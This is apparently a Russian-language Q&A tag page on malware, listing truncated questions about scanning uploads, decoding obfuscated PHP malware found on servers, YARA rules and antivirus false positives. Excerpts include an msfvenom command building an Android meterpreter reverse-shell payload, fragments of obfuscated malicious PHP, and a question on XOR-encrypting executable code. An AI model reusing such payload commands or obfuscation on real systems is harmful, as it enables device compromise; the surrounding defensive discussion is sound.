Описание тега malware

Вредоносное ПО - это любое вредоносное программное обеспечение, скрипт или код, разработанный или используемый с целью компрометации или нанесения вреда информационным активам без информированного согласия владельца. Примеры включают вирусы, черви, шпионское ПО, клавиатурные шпионы, бэкдоры и т. Д.
2 ответа

Проверять загруженный файл на наличие вирусов на компьютере пользователя с помощью php

Есть ли способ сканировать файл, загруженный пользователем на его машине, используя PHP? Я создаю сайт с использованием PHP, где я даю пользователям право загружать файлы любого формата. Теперь я хочу проверить загруженные пользователями файлы на на…
05 апр '15 в 11:43
1 ответ

Как найти и заменить весь текст лицензии из набора файлов с помощью регулярного выражения PHP?

У меня есть несколько файлов PHP, которые содержат текст лицензии GPL, но содержат текст мусора внутри. Я хочу удалить этот полный текст лицензии из всех файлов в каталоге. Какое регулярное выражение будет соответствовать начальному и конечному текс…
13 фев '14 в 15:20
1 ответ

Как подойти к внесению в белый список приложения /exe

У нас есть приложение, которое автоматически устанавливает свои обновления на компьютеры наших клиентов (Windows OS/PC). Он легкий (650 КБ) и выполняет очень специфическую задачу для наших клиентов, помогая нам собирать данные для них как часть обще…
1 ответ

Декодировать вредоносное ПО, найденное на сервере, запутанное как массив символов в PHP

Сегодня я обнаружил вредоносное ПО на одном сайте, я, конечно, удалил его, и все в порядке, но чтобы понять, откуда оно взято, я хотел бы понять его логику, но оно закодировано в довольно Простой способ. В начале файла я вижу: $i96="QU~T<`_YM82iA…
17 сен '14 в 12:57
1 ответ

Нельзя использовать заглавные буквы в слове

Я только что открыл документ Word в формате DOCX, и я не могу набрать букву T в качестве заглавной. Я могу напечатать это в других документах слова на том же компьютере. Причина, по которой я спрашиваю об этом на этом сайте, заключается в том, что я…
27 янв '15 в 22:35
1 ответ

Как предотвратить распознавание моего.exe как вредоносного?

Несколько дней назад я написал небольшой инструмент (см. Проект Github здесь), который работает как единый .exe переносимый файл Он скомпилирован / связан с: cl mytool.c Я загрузил .exe в Интернете, но когда люди пытаются загрузить его (прямая ссылк…
0 ответов

Что этот скрытый фильм Zugo Flash делает на моей странице?

Я нашел странную вещь, спрятанную на моей странице: <div id="SiUnhdqlqHN9t7wB_tbstore_container" style="left: -2000px; top: -2000px; position: absolute;"> <param name="movie" value="http://tbupdate.zugo.com/ztb/2.5/jsi/man/fc.swf"/> <…
19 дек '12 в 15:54
1 ответ

Может ли вредоносное ПО заразить общий сервер?

Привет, дамы и господа Я задаю этот вопрос, потому что в эти выходные я видел, как я превратился из полноволосого мужчины в смелого мужчину за 24 часа. Google обнаружил вредоносное ПО на трех сайтах, которые мы запускаем на общем сервере. Все файлы …
08 сен '13 в 17:53
4 ответа

Что делает этот вредоносный код в приложении?

Привет, я нашел определенный код, введенный в мое приложение php. Кто-нибудь знает, как это возможно, а также объясните мне, как избежать таких уколов. Код присутствует в атрибуте src тега img. Пожалуйста, помогите понять, что делает этот код? src='…
19 мар '12 в 12:50
1 ответ

Написание правил yara на Python

Я читал документацию, и мне было трудно понять это. Перевод очень помог бы. Я наткнулся на это примерное правило Perl для Yara: rule BadBoy { strings: $a = "win.exe" $b = "http://foo.com/badfile1.exe" $c = "http://bar.com/badfile2.exe" condition: $a…
09 май '16 в 14:44
3 ответа

URL-фильтрация

Я ищу способ проверить, относится ли сайт к какой-либо базе данных с фильтрацией URL. Кто-нибудь знает такую ​​базу данных с бесплатным API?
19 май '09 в 20:11
1 ответ

Ошибка в msfvenom "Ошибка: выбран неверный формат" для Android

Сегодня после долгого времени я пытался сделать полезную нагрузку для Android, но я получил там ошибку "Ошибка: выбран неверный формат" msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.4 lport=4444 -f apk -o /var/www/html/files.apk Я поп…
06 авг '17 в 17:04
4 ответа

Как я могу расшифровать этот вредоносный скрипт PHP?

Я просто заметил, что все мои индексные файлы имеют следующий код на моем сервере. Я хотел бы знать, как я могу расшифровать это. и узнать, кто стоит с этим кодом? пожалуйста, вы можете помочь мне, как расшифровать это. <?php @error_reporting(0);…
20 июл '12 в 16:11
1 ответ

Я не вижу код вредоносного ПО при использовании любого редактора

У меня есть вредоносный код (Java), я могу видеть код с помощью (просмотреть исходный код), я не вижу плохой код, когда я использую любой редактор для удаления кода, Мой домен указывает на CloudFlare. Что мне нужно сделать, чтобы увидеть код и удали…
23 янв '17 в 13:29
1 ответ

Почему я получаю нарушение прав доступа при записи в сегмент кода в сборке?

Я делаю эксперименты по шифрованию сегмента кода PE с помощью XOR для каждого байта с некоторым значением ключа. До сих пор мне удалось XOR этого сегмента и вставить в конце сегмента кода двоичный код, который снова декодируется с помощью XORing с т…
1 ответ

Иностранные куки в клиентских запросах

Некоторые клиенты отправляют запросы в наше веб-приложение с помощью дополнительных файлов cookie, например: vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.6332…
3 ответа

Как Антивирус знает, что не нужно обнаруживать не вредоносный код?

Допустим, я создал библиотеку сжатия файлов, и эта библиотека использовалась в 1000 (не вредоносных) программах. Но теперь разработчик вредоносного ПО решил создать вредоносное ПО и использовать мою библиотеку для сжатия некоторых файлов. Основываяс…
02 апр '16 в 03:44
0 ответов

Вредоносные программы изменили все расширение файла и имя в базе данных MySQL

Вредоносные программы изменили все расширение файла и имя в базе данных MySQL. Я изменил их обратно на нормальные, но в phpMyAdmin они показывают, что они повреждены, когда я нажимаю на них, отображается ошибка 1033 Неверная информация в файле. Може…
10 июл '18 в 16:52
0 ответов

Почему мой оверлейный оверлей не работает после взлома сайта?

Я нахожусь в процессе восстановления взлома сайта Wordpress, и почти все возвращается к нормальной жизни. Я обратился за профессиональной помощью, чтобы очистить его, заменить файлы и удалить вредоносную программу, и она выглядит хорошо. НО по какой…
28 сен '18 в 13:03
3 ответа

Веб-сервис powershell привет мир журнал ошибок

Я могу запустить скрипт "hello world", но пытаюсь запустить этот пример скрипта: C:\Users\thufir\Desktop> C:\Users\thufir\Desktop>powershell -ExecutionPolicy RemoteSigned Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights …